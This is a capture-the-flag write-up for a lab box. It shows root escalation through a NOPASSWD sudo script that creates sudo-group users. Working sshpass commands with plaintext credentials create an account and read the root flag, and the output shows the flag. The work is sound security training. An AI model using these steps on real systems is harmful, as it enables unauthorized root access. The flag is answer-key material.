Spray and Pray - III
192.168.1.20OWASPKL{xxx}1. Challenge Overview
Escalate to root on the same box as Parts I/II. niki has NOPASSWD sudo on a writable user-creation script that adds users to the sudo group.
2. Initial Reconnaissance
2.1 Enumerate niki sudo rights + the script
1sshpass -p 'abel_0411@weekndbuk1tj4lil' ssh -o StrictHostKeyChecking=no niki@192.168.1.20 "sudo -l; echo '---'; cat /home/niki/Downloads/gen_user.sh"1User niki may run the following commands on spraynpray:2 (ALL) NOPASSWD: /home/niki/Downloads/gen_user.sh3---4#!/bin/bash5USERNAME=$16PASSWORD=$27useradd -m -s /bin/bash "$USERNAME"8echo "$USERNAME:$PASSWORD" | chpasswd9usermod -aG sudo "$USERNAME"3. Analysis / Forensics Path
3.1 Identify the privesc
The sudo-allowed script runs as root and creates an attacker-controlled user in the sudo group — a direct path to root.
4. Exploitation / Recovery
4.1 Create a sudo user via the script
1sshpass -p 'abel_0411@weekndbuk1tj4lil' ssh -o StrictHostKeyChecking=no niki@192.168.1.20 "sudo /home/niki/Downloads/gen_user.sh sp3root0164 'Sp3Root!2026'; grep '^sp3root0164:' /etc/passwd; getent group sudo"1sp3root0164:x:1009:1009::/home/sp3root0164:/bin/bash2sudo:x:27:spraynpray,jebat,ctfroot,sp3root01644.2 Log in as the new user, hunt the flag in /root, then read it
1sshpass -p 'Sp3Root!2026' ssh -o StrictHostKeyChecking=no sp3root0164@192.168.1.20 "echo 'Sp3Root!2026' | sudo -S id; echo '--- ls /root ---'; echo 'Sp3Root!2026' | sudo -S ls -la /root; echo '--- grep flag ---'; echo 'Sp3Root!2026' | sudo -S grep -Rns 'OWASPKL{' /root 2>/dev/null; echo '--- read ---'; echo 'Sp3Root!2026' | sudo -S cat /root/proof.txt"1uid=0(root) gid=0(root) groups=0(root)2--- ls /root ---3drwx------ 6 root root 4096 May 23 21:48 .4-rw-r--r-- 1 root root 132 Apr 20 16:46 .profile5drwx------ 2 root root 4096 Apr 23 08:43 .ssh6-rw-r--r-- 1 root root 42 May 23 20:13 proof.txt7drwxr-xr-x 3 root root 4096 May 23 19:22 rockyou8--- grep flag ---9/root/proof.txt:1:OWASPKL{05400e69198b6036bc1c05302435648e}10--- read ---11OWASPKL{05400e69198b6036bc1c05302435648e}> Re-validated live on 2026-05-31 via Kali (192.168.1.10): niki retains NOPASSWD on gen_user.sh; the created sudo user listed /root (showing proof.txt), grep confirmed the flag pattern, and cat /root/proof.txt -> flag above.
5. Flag
6. Summary of Approach & Key Takeaways
Logged in as niki (Part II creds).
sudo -l showed NOPASSWD on gen_user.sh.
Script creates sudo users with attacker-chosen passwords.
Created sp3root0164 and escalated to root.
Read /root/proof.txt.
A sudo-runnable script that creates privileged accounts is equivalent to full root.
Always inspect the contents of any NOPASSWD-allowed script.